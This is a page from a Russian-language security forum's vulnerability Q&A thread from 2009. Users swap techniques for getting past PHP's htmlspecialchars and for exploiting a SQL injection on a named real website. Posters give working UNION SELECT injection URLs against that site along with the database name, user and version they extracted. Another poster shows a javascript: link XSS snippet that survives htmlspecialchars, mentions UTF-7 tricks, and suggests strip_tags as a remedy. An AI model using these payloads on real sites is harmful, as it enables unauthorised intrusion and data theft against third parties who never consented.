FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 995 из 2422

995

Опции темы

Поиск в этой теме

Опции просмотра

12.11.2009, 21:31

vorona

Участник форума

Регистрация: 07.09.2009

Сообщений: 298

Провел на форуме:
390301

Репутация: 3

как обходится htmlspecialchars??

12.11.2009, 21:33

fng

Новичок

Регистрация: 12.11.2009

Сообщений: 20

Провел на форуме:
32270

Репутация: 0

n-sider.com
вот этот ресурс...

статьи я читал, но по этой ошибке не нашел инфы к сожалению
количество полей не получилось подобрать

12.11.2009, 21:38

~~LzD~~

Banned

Регистрация: 24.07.2009

Сообщений: 85

Провел на форуме:
229533

Репутация: 43

Цитата:

Сообщение от fng

http://www.n-sider.com/gameview.php?gameid=46+AND+1=2+UNION+SELECT+1,2--
[+] Current Database : nsider
[+] Database User : nsider_mysql@apache2-fungi.pistons.dreamhost.com
[+] MySQL Version : 5.0.67-userstats-log

12.11.2009, 21:37

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Цитата:

Сообщение от [underwater]
Обсуждалось уже, htmlspecialchars() тоже обходиться.
как? О_о

1. UTF-7
2. Если значение после обработки htmlspecialchars попадает в ссылку, например "URL домашней странички", что с успехом подтверждает следующий код:

PHP код:


		
			
<?php 

$a = "javascript:document.write('<script>alert(0)</script>');";

$data = htmlspecialchars($a); 

echo "<a href=$data>Tikni</a>";

?>

просто запустите и удивитесь сильно

PS: Посмотрите исходники странички перед тем, как тыкнуть, и ваще опупейте

Последний раз редактировалось Pashkela; 12.11.2009 в 21:48..

12.11.2009, 21:48

vorona

Участник форума

Регистрация: 07.09.2009

Сообщений: 298

Провел на форуме:
390301

Репутация: 3

Цитата:

Сообщение от Pashkela

PHP код:


		
			
<?php 

$a = "javascript://%0adocument.write('<script>alert(0)</script>');";

$data = htmlspecialchars($a); 

echo "<a href=$data>Tikni</a>";

?>

Я в шоке!!! А что делать??

12.11.2009, 21:54

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Цитата:

Сообщение от vorona

Я в шоке!!! А что делать??

Как бы ужасно это не звучало, но htmlentities приведет к тому же результату

А вот strip_tags решит проблему

PS: Надеюсь многолетние ламерские споры на этом закончатся

Последний раз редактировалось Pashkela; 12.11.2009 в 21:57..

12.11.2009, 21:59

vorona

Участник форума

Регистрация: 07.09.2009

Сообщений: 298

Провел на форуме:
390301

Репутация: 3

Цитата:

Сообщение от Pashkela

Как бы ужасно это не звучало, но htmlentities приведет к тому же результату

А вот strip_tags решит проблему

PS: Надеюсь многолетние ламерские споры на этом закончатся

strip_tags поможет в случае с выводом в ссылку или с утф-7??

12.11.2009, 22:01

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Цитата:

Сообщение от vorona

strip_tags поможет в случае с выводом в ссылку или с утф-7??

UTF-7 сработает только если в браузере стоит автоопределение кодировки, да и то, если браузер поддерживает UTF-7 кодировку вообще. Не очень актуально для современных браузеров

12.11.2009, 21:39

Ins3t

Участник форума

Регистрация: 18.07.2009

Сообщений: 272

Провел на форуме:
2083691

Репутация: 330

2fng,

Код:

http://www.n-sider.com/gameview.php?gameid=-6399'+union+select+1,2,version(),4,5--+&view=screens

вывод в свойставх картинки

#10

12.11.2009, 21:45

fng

Новичок

Регистрация: 12.11.2009

Сообщений: 20

Провел на форуме:
32270

Репутация: 0

спасибо парни, вроде так же делал, не заметил может вывод...

Страница 995 из 2422

995

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Сценарии/CMF/СMS	26	15.02.2005 22:57

Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)

Быстрый переход

ANTICHAT.XYZ